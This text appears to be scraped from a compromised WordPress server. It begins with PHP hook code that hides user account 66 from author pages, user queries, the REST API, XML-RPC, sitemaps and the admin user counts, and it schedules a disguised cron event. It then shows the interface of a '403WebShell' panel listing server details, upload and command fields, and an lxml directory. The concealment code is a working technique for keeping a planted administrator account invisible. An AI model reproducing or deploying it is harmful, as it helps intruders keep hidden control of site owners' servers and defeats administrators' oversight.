add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/814/root/lib/python3/dist-packages/lxml/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 14 2026 06:28:50
root / root
0755
__pycache__
--
April 21 2026 16:59:03
root / root
0755
html
--
April 21 2026 16:59:03
root / root
0755
includes
--
April 21 2026 16:59:03
root / root
0755
isoschematron
--
April 21 2026 16:59:03
root / root
0755
ElementInclude.py
8.359 KB
April 02 2024 08:27:43
root / root
0644
__init__.py
0.561 KB
April 02 2024 08:27:43
root / root
0644
_elementpath.cpython-312-aarch64-linux-gnu.so
203.891 KB
April 03 2024 20:07:13
root / root
0644
_elementpath.py
10.633 KB
April 02 2024 08:27:43
root / root
0644
apihelpers.pxi
62.119 KB
April 02 2024 08:27:43
root / root
0644
builder.cpython-312-aarch64-linux-gnu.so
133.484 KB
April 03 2024 20:07:13
root / root
0644
builder.py
7.91 KB
April 02 2024 08:27:43
root / root
0644
classlookup.pxi
21.909 KB
April 02 2024 08:27:43
root / root
0644
cleanup.pxi
8.256 KB
April 02 2024 08:27:43
root / root
0644
cssselect.py
3.229 KB
April 02 2024 08:27:43
root / root
0644
debug.pxi
3.205 KB
April 02 2024 08:27:43
root / root
0644
docloader.pxi
5.637 KB
April 02 2024 08:27:43
root / root
0644
doctestcompare.py
17.315 KB
April 02 2024 08:27:43
root / root
0644
dtd.pxi
14.871 KB
April 02 2024 08:27:43
root / root
0644
etree.cpython-312-aarch64-linux-gnu.so
1.91 MB
April 03 2024 20:07:13
root / root
0644
etree.h
9.68 KB
April 02 2024 08:28:15
root / root
0644
etree.pyx
130.747 KB
April 02 2024 08:27:43
root / root
0644
etree_api.h
16.663 KB
April 02 2024 08:28:15
root / root
0644
extensions.pxi
31.336 KB
April 02 2024 08:27:43
root / root
0644
iterparse.pxi
16.14 KB
April 02 2024 08:27:43
root / root
0644
lxml.etree.h
9.68 KB
April 02 2024 08:28:17
root / root
0644
lxml.etree_api.h
16.668 KB
April 02 2024 08:28:17
root / root
0644
nsclasses.pxi
8.915 KB
April 02 2024 08:27:43
root / root
0644
objectify.cpython-312-aarch64-linux-gnu.so
400.336 KB
April 03 2024 20:07:13
root / root
0644
objectify.pyx
73.96 KB
April 02 2024 08:27:43
root / root
0644
objectpath.pxi
11.182 KB
April 02 2024 08:27:43
root / root
0644
parser.pxi
79.947 KB
April 02 2024 08:27:43
root / root
0644
parsertarget.pxi
6.178 KB
April 02 2024 08:27:43
root / root
0644
proxy.pxi
23.142 KB
April 02 2024 08:27:43
root / root
0644
public-api.pxi
6.51 KB
April 02 2024 08:27:43
root / root
0644
pyclasslookup.py
0.09 KB
April 02 2024 08:27:43
root / root
0644
readonlytree.pxi
18.531 KB
April 02 2024 08:27:43
root / root
0644
relaxng.pxi
6.19 KB
April 02 2024 08:27:43
root / root
0644
sax.cpython-312-aarch64-linux-gnu.so
197.383 KB
April 03 2024 20:07:13
root / root
0644
sax.py
9.085 KB
April 02 2024 08:27:43
root / root
0644
saxparser.pxi
32.541 KB
April 02 2024 08:27:43
root / root
0644
schematron.pxi
5.77 KB
April 02 2024 08:27:43
root / root
0644
serializer.pxi
66.358 KB
April 02 2024 08:27:43
root / root
0644
usedoctest.py
0.225 KB
April 02 2024 08:27:43
root / root
0644
xinclude.pxi
2.398 KB
April 02 2024 08:27:43
root / root
0644
xmlerror.pxi
48.686 KB
April 02 2024 08:27:43
root / root
0644
xmlid.pxi
5.931 KB
April 02 2024 08:27:43
root / root
0644
xmlschema.pxi
8.291 KB
April 02 2024 08:27:44
root / root
0644
xpath.pxi
18.684 KB
April 02 2024 08:27:44
root / root
0644
xslt.pxi
35.179 KB
April 02 2024 08:27:44
root / root
0644
xsltext.pxi
10.828 KB
April 02 2024 08:27:44
root / root
0644

Youez - 2016 - github.com/yon3zu
LinuXploit